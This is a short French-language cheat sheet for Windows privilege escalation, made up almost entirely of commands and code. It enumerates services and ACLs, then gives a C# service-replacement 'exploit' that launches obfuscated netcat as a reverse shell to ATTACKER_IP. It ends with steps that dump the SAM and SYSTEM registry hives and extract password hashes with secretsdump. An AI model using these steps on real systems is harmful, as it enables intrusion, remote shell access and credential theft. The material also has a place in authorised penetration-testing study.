Trouve les services qui ne sont pas ceux de Windows
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
Quel est l’usager exécutant un service
sc qc SERVICE_NAME
Vérification si on peut écrire dans un répertoire
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
Remplacement d’un service par un autre (exploit)
Wrapper.cs
using System;
using System.Diagnostics;
namespace Wrapper{
class Program{
static void Main(){
Process proc = new Process();
ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc-obfuscated.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
procInfo.CreateNoWindow = true;
proc.StartInfo = procInfo;
proc.Start();
}
}
}
On compile ce code
mcs Wrapper.cs
sc stop SERVICE_NAME
sc start SERVICE_NAME #normal d'avoir des erreurs
Exfiltration
reg.exe save HKLM\SAM sam.bak
reg.exe save HKLM\SYSTEM system.bak
python3 /opt/impacket/examples/secretsdump.py -sam PATH/TO/SAM_FILE -system PATH/TO/SYSTEM_FILE LOCAL #sur l'ordi de l'attaquant